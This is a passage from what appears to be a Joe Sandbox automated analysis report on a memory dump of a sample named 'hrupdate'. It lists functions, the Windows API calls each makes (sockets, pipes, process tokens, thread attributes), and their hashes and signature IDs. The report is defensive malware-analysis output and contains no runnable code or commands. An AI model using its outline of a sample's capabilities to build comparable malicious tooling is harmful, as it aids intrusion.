                                                                • SetLastError.KERNEL32(00000006,?,?,?,?,00000000,?,?,?,?,?,?,?,04FC9F20), ref: 04FCA802
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$Version_memset
                                                                • String ID:
                                                                • API String ID: 452624306-0
                                                                • Opcode ID: 6aa56c24273e141a84c9a11d0c5b97f6f98750ffb279d452cd18ce501dd01303
                                                                • Instruction ID: 33651d8b2508bc54de2f62d70d572d62830231a7de39fe3a5c9203f375cd9a2f
                                                                • Opcode Fuzzy Hash: 6aa56c24273e141a84c9a11d0c5b97f6f98750ffb279d452cd18ce501dd01303
                                                                • Instruction Fuzzy Hash: D5310471E40209BBEB309E719D45F9B7AB8EF45714F140468EA0EE7181E670BA43C7A0
                                                                Function 04FE8A98 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04FE8ACC
                                                                • __isleadbyte_l.LIBCMT ref: 04FE8B00
                                                                • MultiByteToWideChar.KERNEL32(00D0E035,00000009,04FF655C,FFFFFB4C,04FF655C,00000000,?,?,?,04FC5E94,04FF655C,04FF655C,00000000), ref: 04FE8B31
                                                                • MultiByteToWideChar.KERNEL32(00D0E035,00000009,04FF655C,00000001,04FF655C,00000000,?,?,?,04FC5E94,04FF655C,04FF655C,00000000), ref: 04FE8B9F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: 24d4c0d316f5661a31399599537bb842737ed2139e56a6fa5001f6c64a25fd2c
                                                                • Instruction ID: ebb8bedfe06c583a1ca74b89aee09ff05ed2e890c90857854cb379d8d0fe3216
                                                                • Opcode Fuzzy Hash: 24d4c0d316f5661a31399599537bb842737ed2139e56a6fa5001f6c64a25fd2c
                                                                • Instruction Fuzzy Hash: 4731B071A00245FFDB20FF65CC849BE3BA5FF01392F1885A9E4659B191E730E942EB52
                                                                Function 04FD2F47 Relevance: 6.1, APIs: 4, Instructions: 79sleepsynchronizationthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FAE
                                                                • RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FE7
                                                                • WaitForSingleObject.KERNEL32(00000000,?,?,04FC39A6), ref: 04FD3003
                                                                • ExitProcess.KERNEL32 ref: 04FD300F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Exit$ObjectProcessSingleSleepThreadUserWait
                                                                • String ID:
                                                                • API String ID: 845863014-0
                                                                • Opcode ID: d00f7fb41fd86c97e9ee76323c02adf03be0c82c24689422c757b3763814e66c
                                                                • Instruction ID: 55811c1a9a2735aae316bfe5b3b09571e001bd62d53161fc4f77fc8b8a599c17
                                                                • Opcode Fuzzy Hash: d00f7fb41fd86c97e9ee76323c02adf03be0c82c24689422c757b3763814e66c
                                                                • Instruction Fuzzy Hash: 2311E632E04214AAFA263FB52D45D6F7B6EDFC17A9F18045EF500A60C0DE66B80391B1
                                                                Function 04FC6759 Relevance: 6.1, APIs: 4, Instructions: 78synchronizationpipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC676C
                                                                • CreatePipe.KERNEL32(?,?,?,00100000), ref: 04FC67A2
                                                                • GetStartupInfoA.KERNEL32(?), ref: 04FC67AC
                                                                • WaitForSingleObject.KERNEL32(?,00002710), ref: 04FC67F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                                                                • String ID:
                                                                • API String ID: 468459245-0
                                                                • Opcode ID: 6d2d2882e9e0957b520353da8b682e3aef27c0bb28686c40d282ab6ee513de8b
                                                                • Instruction ID: f1e364a23a44db4a520d9893b7a6c44d8596c6b8b4dc5024e2991a44bedaaca4
                                                                • Opcode Fuzzy Hash: 6d2d2882e9e0957b520353da8b682e3aef27c0bb28686c40d282ab6ee513de8b
                                                                • Instruction Fuzzy Hash: 79211972D0011DBFEB10DFA8DD45ADEBBB9EF48314F10016AE914E6191E771AA058BA1
                                                                Function 04FC32FF Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FC3314
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                  • Part of subcall function 04FC8A21: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000,00002000,?,04FC32B4,00000000,?,00002000,?,00002000,?,?,?,00000000), ref: 04FC8A33
                                                                • _memset.LIBCMT ref: 04FC3369
                                                                • _memset.LIBCMT ref: 04FC3378
                                                                • _memset.LIBCMT ref: 04FC338F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
                                                                • String ID:
                                                                • API String ID: 2041733451-0
                                                                • Opcode ID: e16a93eb9438b0c8cadb9e9b4acbbcceb47e9e17553437223edf810aa4094668
                                                                • Instruction ID: 5cc30732d5d8312326fddbf7d23817b6dbe3526d21b793502c5cf7974b400e33
                                                                • Opcode Fuzzy Hash: e16a93eb9438b0c8cadb9e9b4acbbcceb47e9e17553437223edf810aa4094668
                                                                • Instruction Fuzzy Hash: 26113872A04146BAE7106F748D80AF67B6EDF431A8F14405CE94993142EB22B907C3E1
                                                                Function 04FD095D Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID:
                                                                • API String ID: 2102423945-0
                                                                • Opcode ID: a8e79b0bd3e4c6bb58b301dc2ac853f9d2ce3df56b59d11478fa43cfc3caf90a
                                                                • Instruction ID: 463bef4c964b17c09a4c40fd3d8cf11d37573bfdbd2f99f90a3fcbb4c9073d51
                                                                • Opcode Fuzzy Hash: a8e79b0bd3e4c6bb58b301dc2ac853f9d2ce3df56b59d11478fa43cfc3caf90a
                                                                • Instruction Fuzzy Hash: A001E572501204BEFB106E629CC1DBF3F5EAB442ACF449425F60896201DE79A913C7B6
                                                                Function 04FC4B89 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FC4BA3
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • htonl.WS2_32(?), ref: 04FC4BB2
                                                                • htonl.WS2_32(?), ref: 04FC4BBC
                                                                • _memset.LIBCMT ref: 04FC4BDE
                                                                  • Part of subcall function 04FDD93E: __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FDD93E: ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                  • Part of subcall function 04FDD93E: ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                  • Part of subcall function 04FDD93E: HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                  • Part of subcall function 04FDD93E: GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Heaphtonl$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                • String ID:
                                                                • API String ID: 2558508226-0
                                                                • Opcode ID: 7feda87b28366810f08a1a7a44708eb7e761c1c3eb7c7ab0f28fcaead41cd548
                                                                • Instruction ID: f5d3a0cbbd68bfb53c08886928181d6d25251756b72c89dd4539c0c959b1bf8d
                                                                • Opcode Fuzzy Hash: 7feda87b28366810f08a1a7a44708eb7e761c1c3eb7c7ab0f28fcaead41cd548
                                                                • Instruction Fuzzy Hash: 0701AC76901316BBEB126FA1CD40EEF776CDF41654B008019F9046A114E631B6139795
                                                                Function 04FD40FD Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _clock
                                                                • String ID:
                                                                • API String ID: 876827150-0
                                                                • Opcode ID: b758daacf63da5c7291ca6bd382674ea900c029546b509ca3099d54fa5c54ebe
                                                                • Instruction ID: 539cf894ac3841db2975dc66f40978d1b8f5937845267525418fdaef6a8bc241
                                                                • Opcode Fuzzy Hash: b758daacf63da5c7291ca6bd382674ea900c029546b509ca3099d54fa5c54ebe
                                                                • Instruction Fuzzy Hash: D3017531D0062AEF8F12DFE9C8C15ADBBB5EF55245F5840BBD411A7101E7706A42CBA0
                                                                Function 04FD31F6 Relevance: 6.0, APIs: 4, Instructions: 41threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 04FD3203
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 04FD320A
                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 04FD322D
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 04FD3234
                                                                  • Part of subcall function 04FD317B: __snprintf.LIBCMT ref: 04FD31C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken$__snprintf
                                                                • String ID:
                                                                • API String ID: 3849403947-0
                                                                • Opcode ID: f3d297d923697dc4061eabbb0481f96d3185ef1eb05d8c9a282643330041971a
                                                                • Instruction ID: 2c80a5e93604f25587d0a45805d1eff3b236b0247eef48f296eff7c4ac511639
                                                                • Opcode Fuzzy Hash: f3d297d923697dc4061eabbb0481f96d3185ef1eb05d8c9a282643330041971a
                                                                • Instruction Fuzzy Hash: 16F04F72900208BBEB11AFA5ED0AB6D366EEF0464AF184015BB4590092DFB5B9029622
                                                                Function 04FD3F40 Relevance: 6.0, APIs: 4, Instructions: 40networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • accept.WS2_32(?,00000000,00000000), ref: 04FD3F4E
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 04FD3F7B
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 04FD3F89
                                                                • closesocket.WS2_32(00000000), ref: 04FD3F94
                                                                  • Part of subcall function 04FD3ED0: closesocket.WS2_32(?), ref: 04FD3ED2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: closesocketsend$accept
                                                                • String ID:
                                                                • API String ID: 2168303407-0
                                                                • Opcode ID: b454ce588b62f5703d09c3983a3c2bed156a97715bce37e0f9d78efe98a385ef
                                                                • Instruction ID: 2c47d38f31f162dba309b15e1b2c39beadda2eb19481dbc706f6ac3a49dab007
                                                                • Opcode Fuzzy Hash: b454ce588b62f5703d09c3983a3c2bed156a97715bce37e0f9d78efe98a385ef
                                                                • Instruction Fuzzy Hash: 60F0B432100708BBE7303BB4FC41F6BB76EEF08635F284A06F756674D18661B4125762
                                                                Function 04FCCFCA Relevance: 6.0, APIs: 4, Instructions: 39memorythreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeProcThreadAttributeList.KERNELBASE(00000000,04FCD06D,00000000,00000000), ref: 04FCCFE5
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,04FCD06D,00000000), ref: 04FCCFEB
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04FCCFF2
                                                                • InitializeProcThreadAttributeList.KERNELBASE(00000000,04FCD06D,00000000,00000000), ref: 04FCD007
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AttributeHeapInitializeListProcThread$AllocateProcess
                                                                • String ID:
                                                                • API String ID: 3402284281-0
                                                                • Opcode ID: 870ccb06aa37f9d111e32f42aac496dc81f94385de449bcd08d287b745a01248
                                                                • Instruction ID: 39b4ee766ab11212b84da41281dfac4b7694c1826fc0443a1732fb577b9a6c8d
                                                                • Opcode Fuzzy Hash: 870ccb06aa37f9d111e32f42aac496dc81f94385de449bcd08d287b745a01248
                                                                • Instruction Fuzzy Hash: CDF05E76A00109BF8B119BE9AD88CAF7EBCDB89650710002AFA01D3101EA359A42EB70
                                                                Function 04FCAE8B Relevance: 6.0, APIs: 4, Instructions: 35sleeppipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCAE9D
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 04FCAEB1
                                                                • Sleep.KERNEL32(000001F4), ref: 04FCAEC5
                                                                • GetTickCount.KERNEL32 ref: 04FCAECB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$NamedPeekPipeSleep
                                                                • String ID:
                                                                • API String ID: 1593283408-0
                                                                • Opcode ID: 1ba7578e73c7f670c19230585de33f79d995dfa87d6df4d3ab1722108d267bae
                                                                • Instruction ID: 242b07e1175d308e119ba4cb45b446595a6a0fcf8c39ffbbee42cc3ff7fc1c4d
                                                                • Opcode Fuzzy Hash: 1ba7578e73c7f670c19230585de33f79d995dfa87d6df4d3ab1722108d267bae
                                                                • Instruction Fuzzy Hash: 22F08C72E0010EFFAB005F95AE809AFB7ACEE44298710447AE501A2000EAB0BD429BA0
                                                                Function 04FE644A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 04FE6456
                                                                  • Part of subcall function 04FDF61D: __getptd_noexit.LIBCMT ref: 04FDF620
                                                                  • Part of subcall function 04FDF61D: __amsg_exit.LIBCMT ref: 04FDF62D
                                                                • __getptd.LIBCMT ref: 04FE646D
                                                                • __amsg_exit.LIBCMT ref: 04FE647B
                                                                • __lock.LIBCMT ref: 04FE648B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                • String ID:
                                                                • API String ID: 3521780317-0
                                                                • Opcode ID: 402d2232e00ea02ac5c7eb93ddec67d33770eaf6eaa4cf4b9d84c0c47ab7d36e
                                                                • Instruction ID: 924a58915f7b611fdf79397977a8a458c067a8d4c0e4117842a3221424f8777e
                                                                • Opcode Fuzzy Hash: 402d2232e00ea02ac5c7eb93ddec67d33770eaf6eaa4cf4b9d84c0c47ab7d36e
                                                                • Instruction Fuzzy Hash: B7F01D32E007189FF720BF669805B6A72A1AF4471AF844549A455EB690CFB8B903CA52
                                                                Function 04FD13B3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: l.dl$ntdl
                                                                • API String ID: 2102423945-1236859653
                                                                • Opcode ID: 162390367584f635dd1b7117cd7faa496fdcb92568cab84af576ced0a503f385
                                                                • Instruction ID: 927622fa94e7b3cdfe955496c00a30735d69ca2e953d37d7c9c8bf7f8af28978
                                                                • Opcode Fuzzy Hash: 162390367584f635dd1b7117cd7faa496fdcb92568cab84af576ced0a503f385
                                                                • Instruction Fuzzy Hash: 79713674E00209DFDB14CF98C680AADB7B2FF48315F2880AAD845AB355D734EE52CB90